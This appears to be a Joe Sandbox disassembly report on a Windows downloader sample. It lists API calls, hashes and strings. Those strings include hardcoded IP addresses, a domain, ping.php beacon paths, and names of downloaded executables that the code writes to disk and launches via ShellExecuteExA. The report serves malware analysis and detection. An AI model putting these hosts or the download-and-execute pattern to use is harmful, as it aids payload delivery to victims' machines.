User-Agent: , xrefs: 00426C73, 00426CF5, 00426D0C
GET , xrefs: 00426AF5, 00426B17, 00426B31
(KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36, xrefs: 00427015, 0042729B, 004272B2
185.172.128.228, xrefs: 0042677C
Transfer-Encoding, xrefs: 0042690B, 004269C9, 004275E7
POST , xrefs: 00426AA7, 00426AD5, 00426B39
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 , xrefs: 00426D1E, 00426FEC, 00427003
Content-Length, xrefs: 00426853, 004268ED, 004275AB
chunked, xrefs: 004269E7, 00426A2D, 004275F8
HTTP/1.1 200 OK, xrefs: 0042678D, 0042683A, 0042754B

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: recv$Cleanupsend$H_prologStartupclosesocketconnectgethostbynamehtonssocket
String ID: HTTP/1.1$(KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36$/ping.php?substr=%s$185.172.128.228$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
API String ID: 791229064-1542616328
Opcode ID: 9d952c8ba9e130eda5d1cf078896611f00e5a5c92a92760575dbbb648ba0a804
Instruction ID: 4e55451fc037eb126e07087a8435dc815b4e607a9865e0499e256671a6cdd487
Opcode Fuzzy Hash: 9d952c8ba9e130eda5d1cf078896611f00e5a5c92a92760575dbbb648ba0a804
Instruction Fuzzy Hash: F39287209062E19ACB02FFB56C5659E7FF4591530D714747FE690AF393CB2C86088B9E

Uniqueness

Uniqueness Score: -1.00%

Function 00424A0E Relevance: 48.6, APIs: 2, Strings: 25, Instructions: 1388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004265BC: __EH_prolog.LIBCMT ref: 004265C1

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 00424AD4

Part of subcall function 0042604A: __EH_prolog.LIBCMT ref: 0042604F
Part of subcall function 0042604A: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131

Strings

/ping.php?substr=%s, xrefs: 00425387, 0042545D, 00425475
.exe, xrefs: 004258B1, 004258D3
185.172.128.228, xrefs: 004252C0, 00425366, 004254E5
/timeSync.exe, xrefs: 0042575F, 004257F2, 00425860
Installed, xrefs: 004251FF, 0042525D
185.172.128.203, xrefs: 004255F7, 0042569D, 0042583F
/syncUpd.exe, xrefs: 004256BC, 0042573E, 0042586F
/BroomSetup.exe, xrefs: 00425DE7, 00425E8D, 00425EDB
/1/Package.zip, xrefs: 00425A14, 00425AAE, 00425B08
P, xrefs: 004254F5
SOFTWARE\BroomCleaner, xrefs: 004250F1, 004251E5
.zip, xrefs: 00425B5D, 00425B7F
sub=([\w-]{1,255}), xrefs: 00424AA2
\run.exe, xrefs: 00425BD0, 00425C28
P, xrefs: 00425EE3
185.172.128.228, xrefs: 00425D21, 00425DCD, 00425ED2
185.172.128.59, xrefs: 0042553C, 004255D6, 0042584D
.exe, xrefs: 00425F26, 00425F48
185.172.128.90, xrefs: 00424FB3, 0042504D, 0042509B
P, xrefs: 00425B10
one, xrefs: 00424B2A, 00424B45, 00424D9B
P, xrefs: 004250AB
note.padd.cn.com, xrefs: 00425942, 004259FA, 00425AFF
P, xrefs: 00425855
/cpa/ping.php?substr=%s&s=ab&sub=%s, xrefs: 00424DB6, 00424F4C, 00424F65

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
String ID: .exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$note.padd.cn.com$one$sub=([\w-]{1,255})
API String ID: 2531350358-1167600277
Opcode ID: 9052fb54abde8957b0c8dcd2af763798e33b4e0189765b8ce0abbbbf1defcb6f
Instruction ID: d125a89a0ba1aec4cd60c53361ca74c042bcd3054cac0714d62587379a507679
Opcode Fuzzy Hash: 9052fb54abde8957b0c8dcd2af763798e33b4e0189765b8ce0abbbbf1defcb6f
Instruction Fuzzy Hash: EFB2131050A2E19AC712FB7958567CA2FE49B62309F54687FE7D01F2A3CB78460C87DE

Uniqueness

Uniqueness Score: -1.00%

Function 004139E7 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
ExitProcess.KERNEL32 ref: 00413A21

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction ID: 8e17948dea93fcc861bafccf52e4138581932e64e8d8508709b4de54f2ab24c4
Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction Fuzzy Hash: 83E0B631100108ABCF21AF65DD09A993B69EF54786F444029F9869A232DB39EE92CA48

Uniqueness

Uniqueness Score: -1.00%

Function 040963B6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 040963DE
Module32First.KERNEL32(00000000,00000224), ref: 040963FE

Memory Dump Source

Source File: 00000006.00000002.2693695310.0000000004095000.00000040.00000020.00020000.00000000.sdmp, Offset: 04095000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4095000_i1.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 050f1a6994deeff516890b85f9d9b802fe805882f5696d02fb5471978b150518
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 78F06231600710ABEB203AF5A98CBAB77E8EF49725F104929E646A14C0DBB1FC465661

Uniqueness

Uniqueness Score: -1.00%

Function 0041A242 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00419F10: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00419F2D

GetLastError.KERNEL32 ref: 0041A356
__dosmaperr.LIBCMT ref: 0041A35D
GetFileType.KERNEL32(00000000), ref: 0041A369
GetLastError.KERNEL32 ref: 0041A373
__dosmaperr.LIBCMT ref: 0041A37C
CloseHandle.KERNEL32(00000000), ref: 0041A39C
CloseHandle.KERNEL32(?), ref: 0041A4E6
GetLastError.KERNEL32 ref: 0041A518
__dosmaperr.LIBCMT ref: 0041A51F

Strings

H, xrefs: 0041A4A4

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 975f7ae23b976af0f57ba7f63c5262953fac7c3e1b8646b278d3dfb303d0f39f
Instruction ID: 6253cfc56dbab61e205766efb0611ca8061eb8c5ebbdbf8fd01913e42387971c
Opcode Fuzzy Hash: 975f7ae23b976af0f57ba7f63c5262953fac7c3e1b8646b278d3dfb303d0f39f
Instruction Fuzzy Hash: A4A13632A041089FDF199F78D8517EE7BA1AB06324F14019EEC15EB391D7398DA2C79A

Uniqueness

Uniqueness Score: -1.00%

Function 004192AD Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e76cb713194fa4f728ec747c36cb0267ce7d8b1f5e695f35cd7f37fd194786d6
Instruction ID: c4abe014ee414803f6a4a6dca87339887fd42b2314c6943b79fa01ee0dc397dc
Opcode Fuzzy Hash: e76cb713194fa4f728ec747c36cb0267ce7d8b1f5e695f35cd7f37fd194786d6
Instruction Fuzzy Hash: 1CC13AB1E04249AFDB11CFA9C850BEE7BB1BF09314F04019AE954A7392C7389DC1CB69

Uniqueness

Uniqueness Score: -1.00%

Function 05C9003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 05C9024D

Strings

cess, xrefs: 05C9018D
kernel32.dll, xrefs: 05C9008F, 05C90095

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 344c74f73bdec1e4cf5ad6e346653855e1632abba8ed6f1532978866b1e6ef60
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 41526974A01229DFDB64CF58C988BACBBB1BF09314F1484D9E94DAB351DB30AA85DF14

Uniqueness

Uniqueness Score: -1.00%

Function 0042628B Relevance: 12.3, APIs: 8, Instructions: 275
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 004262AD
CoCreateInstance.OLE32(00429220,00000000,00000001,00429210,?,?,?,?,?,?,?,?,?,?,?,/ping.php?substr=%s), ref: 004262C7
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00426309
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426311
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 00426338
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 0042634E
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426355
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 0042637A

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString$CreateInitializeInstance
String ID:
API String ID: 3070066007-0
Opcode ID: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
Instruction ID: 83f5cca910cad30c2957a1169f386ac85e7f4b82ddc6b65933772462ec616701
Opcode Fuzzy Hash: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
Instruction Fuzzy Hash: 3A914B75A00218AFDB04DFA8D888AEEBBB9FF49314F544559F805EB241D776AC02CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0042615A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0042615F
RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 00426187
RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 0042620A
RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042622B

Strings

Installed, xrefs: 00426169, 00426197, 004261B6, 004261B7
SOFTWARE\BroomCleaner, xrefs: 00426167, 0042617A

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: CloseCreateH_prologValue
String ID: Installed$SOFTWARE\BroomCleaner
API String ID: 1996196666-529226407
Opcode ID: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction ID: 7631ba6f6479b49e2955b4a66f7b67ea7b8ea0f8d2650bf46820f955d15f7583
Opcode Fuzzy Hash: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction Fuzzy Hash: F3319A71A00129EEDF149FA8DC94AFEBB78EB08348F44016EE80277281C7B11D05CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00426510 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExA.SHELL32(?,.exe), ref: 00426552
WaitForSingleObject.KERNEL32(?,00008000), ref: 00426566
CloseHandle.KERNEL32(?), ref: 0042656F

Strings

.exe, xrefs: 0042651B

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: CloseExecuteHandleObjectShellSingleWait
String ID: .exe
API String ID: 3837156514-4119554291
Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction ID: 8ce7cd6e21d80bec1428d2ca161df36b0ad46b5534dc267783c352d5b9ba18c9
Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction Fuzzy Hash: 1B015A31E00218ABDF15DFA9E8459DDBBB8FF08340F418126F801A6260EB709A45CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00426242 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,0042590D,00000001,?,/ping.php?substr=%s), ref: 0042625D
WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 00426275
FindCloseChangeNotification.KERNEL32(00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 0042627E

Strings

.exe, xrefs: 00426247

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationWrite
String ID: .exe
API String ID: 3805958096-4119554291
Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction ID: 1160b3d028a4f0b3eb39880a7a2cc02b481a356c14d22bba427b687e2e61c155
Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction Fuzzy Hash: 19E06D72701224BBD7311B9AAC48FABBE6CEF86AA4F040165FB05D2110A6A1DC0197B8

Uniqueness

Uniqueness Score: -1.00%

Function 004163FD Relevance: 4.6, APIs: 3, Instructions: 61
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 00416453
GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 0041645D
__dosmaperr.LIBCMT ref: 00416488

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
Instruction ID: 375721714d43bc4782e6a43c23cd9332c59ec42f2299351a345cb8f3503d09eb
Opcode Fuzzy Hash: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
Instruction Fuzzy Hash: EA014E3360412016D6256635E8457FF67599B82738F2B017FFD188B2D2EB6CDCC2819D

Uniqueness

Uniqueness Score: -1.00%

Function 00419767 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
__dosmaperr.LIBCMT ref: 004197B1

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: dad49dafcb6aaf0294d2e2872a6b63d175876bddee0454d410784651848899ac
Instruction ID: ffc3df5eb890e326191760c687c06a6ec256fa7eb9c4ce0b7ceac38b7dc3edc6
Opcode Fuzzy Hash: dad49dafcb6aaf0294d2e2872a6b63d175876bddee0454d410784651848899ac
Instruction Fuzzy Hash: 70012D36620119ABCB159F59DC059EE7B29DF85330B28024AFC219B2D0E6749C918798

Uniqueness

Uniqueness Score: -1.00%

Function 004264F9 Relevance: 4.5, APIs: 3, Instructions: 7
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32(?), ref: 00426502
SysFreeString.OLEAUT32(?), ref: 00426507
CoUninitialize.OLE32 ref: 00426509

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: FreeString$Uninitialize
String ID:
API String ID: 1985688103-0
Opcode ID: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
Instruction ID: 20283bebf02f6add892787a5acbccff6c180d450b55e9b59979360a618d6bcd4
Opcode Fuzzy Hash: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
Instruction Fuzzy Hash: A6B09230D02029ABEF22AB62EE0D45C7F32FF40350F410061F405332308B351D22EE88

Uniqueness

Uniqueness Score: -1.00%

Function 00401BB2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00401BB7

Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081

Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E

Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70

Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8

Strings

v*@, xrefs: 00401BD0

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
String ID: v*@
API String ID: 3966877926-3062513736
Opcode ID: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
Instruction ID: cee5f8951f4aa60660b8f0772aceb561b5f660f34992c4678438f01180239965
Opcode Fuzzy Hash: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
Instruction Fuzzy Hash: FC218EB1611106AFD708DF59C849A6AB7F9FF48348F14822EE116A7341C7B8DD008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0042604A Relevance: 3.1, APIs: 2, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0042604F

Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7

Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: H_prolog$Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 420165198-0
Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction ID: 115bff912634c1bae9a386948b342ebf01da51d0a41a8c3d45e1fed53d0017c0
Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction Fuzzy Hash: 3531F770D01119EBDB14EF95E985AEDFBB4FF48304F1081AEE405B3681DB786A04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 05C90E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,05C90223,?,?), ref: 05C90E19
SetErrorMode.KERNEL32(00000000,?,?,05C90223,?,?), ref: 05C90E1E

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 82dec5b0cf3f0000fb4619ce5ca7121fae97a8191cddaf1831db315fcefb5c42
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 71D0123514512877DB002A94DC0DBCD7B1CDF05B62F008411FB0DE9080C770964046E5

Uniqueness

Uniqueness Score: -1.00%

Function 0041878B Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89ee0429e7c3b78fee215e5908ca075a1a99ef19cdf9331575feb5a3c314da26
Instruction ID: 7f647bd7b68c58480356602612fa02c60fce203f31c4afd0b56fb408a9d690c1
Opcode Fuzzy Hash: 89ee0429e7c3b78fee215e5908ca075a1a99ef19cdf9331575feb5a3c314da26
Instruction Fuzzy Hash: 2851F771A00108AFDB10DF69C840BFA7BA5EF85364F59815EE8489B392CB39DD82C795

Uniqueness

Uniqueness Score: -1.00%

Function 00401F2B Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00402008

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
Instruction ID: 92d79e160b507baa56e58511ea190f57013b3733b8d645c4d1d18e9f5b661b4d
Opcode Fuzzy Hash: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
Instruction Fuzzy Hash: EA317C31604706AFD710DE29C884A5ABBA0BF88354F04863FFD54A73A1D779D854CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004024A1 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004024A6

Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: Exception@8H_prologThrowstd::system_error::system_error
String ID:
API String ID: 938716162-0
Opcode ID: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
Instruction ID: 74f8325a11d62ea13fad7549c786a5ed5267532987f834d27d08a699b4d18117
Opcode Fuzzy Hash: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
Instruction Fuzzy Hash: C3318B71A00505AFCB18DF29C9D5EAAB7F5FF84318718C16EE416AB791C634EC00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040257C Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402581

Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
Instruction ID: 2a6667c304d01eacddf9d20035e77db0555498f4c479ac31cd54c3f05400b439
Opcode Fuzzy Hash: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
Instruction Fuzzy Hash: D9319870A00615AFCB15DF09CA84A9EBBB1FF48314F14856EE415AB791C7B9ED40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00402403 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402408

Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
Instruction ID: acc1f40cfc044376a2f11a90f6c11c43800a5431404741bf8f8bd34e997dcd85
Opcode Fuzzy Hash: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
Instruction Fuzzy Hash: 0F218E70601611DFC728DF15C54896ABBF5FF88314B10C26DE85A9B7A1C770EE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0041AED0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0041AF0E

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
